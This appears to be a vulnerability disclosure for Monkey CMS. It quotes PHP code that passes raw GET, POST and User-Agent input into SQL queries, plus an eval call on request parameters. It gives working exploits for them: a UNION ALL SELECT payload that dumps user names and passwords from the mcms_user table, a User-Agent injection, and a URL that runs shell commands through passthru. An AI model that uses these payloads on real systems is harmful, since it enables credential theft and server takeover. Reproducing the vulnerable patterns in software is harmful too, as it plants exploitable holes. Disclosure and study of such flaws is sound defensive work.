SQL-Injection :

Vulnerable lines of advancedsearch.php (Lines from 23 through 50):
...
...
case 'advancedsearch.php':
      $action = $_GET['action'];
      $asstart = $_GET['asstart'];
      $contentelement = $_GET['contentelement'];
      $definitionid = $_GET['definitionid'];
      $direction = $_GET['direction'];
      $enddate = $_GET['enddate'];
      $orderby = $_GET['orderby'];
      $perpage = $_GET['perpage'];
      $searchid = $_GET['searchid'];
      $searchterm = $_GET['searchterm'];
      $startdate = $_GET['startdate'];
      $typeid = $_GET['typeid'];
break;
...
...
 
Vulnerable lines of advancedsearch2.php (Lines from 23 through 50):
 
...
...
case 'advancedsearch2.php':
      $action = $_POST['action'];
      $asstart = $_POST['asstart'];
      $contentelement = $_POST['contentelement'];
      $definitionid = $_POST['definitionid'];
      $direction = $_POST['direction'];
      $enddate = $_POST['enddate'];
      $orderby = $_POST['orderby'];
      $perpage = $_POST['perpage'];
      $searchterm = $_POST['searchterm'];
      $startdate = $_POST['startdate'];
      $typeid = $_POST['typeid'];
break;
...
...
 
 
Exploit (POST request to pages above): 
action=search&asstart=0&contentelement=1&definitionid=1 
UNION ALL SELECT 
NULL,CONCAT(0x3a6c70653a,password,0x766763616b68,user_name,0x3a626e743a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL 
FROM monkey.mcms_user

Vulnerable lines of global.php (Lines 456,526): 
...
...
"insert into guests (ip_address, datetime, user_agent, is_bot, 
last_page) values ('$ip', '".date("Y-m-d H:i:s")."', 
'".$_SERVER['HTTP_USER_AGENT']."', '".$ib."', '".selfURL()."')";
...
...
  
Exploit (POST request to pages "index.php","login.php",ETC): Attack is 
capable of injecting by USER_AGENT
 
Remote command execution:

Vulnerable lines of functions.php (Lines 2272,2273):
...
...
$strCommand = "\$p = \$arrayFunctions[$function[0]"."_parameters];";
eval($strCommand);
...
...
 
Exploit (GET request):
http://site.com/[Path of Monkey 
CMS]/index.php?page=TagIndex&tags=${passthru('dir')}
